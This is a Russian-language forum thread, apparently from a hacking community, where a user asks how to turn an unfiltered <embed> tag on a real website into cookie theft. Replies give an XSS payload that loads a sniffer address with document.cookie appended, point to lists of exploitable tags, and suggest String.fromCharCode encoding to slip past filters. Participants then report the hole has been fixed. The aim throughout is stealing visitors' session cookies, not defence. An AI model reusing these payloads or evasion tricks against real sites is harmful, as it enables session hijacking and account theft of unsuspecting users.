Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.

также, как и обычно

Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.

В XSS не особо,но по моему так:
<embed src=javascript:src='адрес снифера';this.avi>

+document.cookie :D

Бля,точно,пропустил:(
спс за поправку!

:):) Вообще,есть список *уязвимых* тегов касательно XSS.
http://www.inattack.ru/article/519.html к примеру,но был список и получше...

А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..

alert(document.cookies) выдает вместо cookies undefined

Типа защита такая что-ли))))

ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.

попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx

ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.

Точно.. сорри! Теперь выводит пустой алерт.

попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx

Спс

Естессно ничего не выведет,ибо пофиксено.

Да, к сожалению, именно так.. (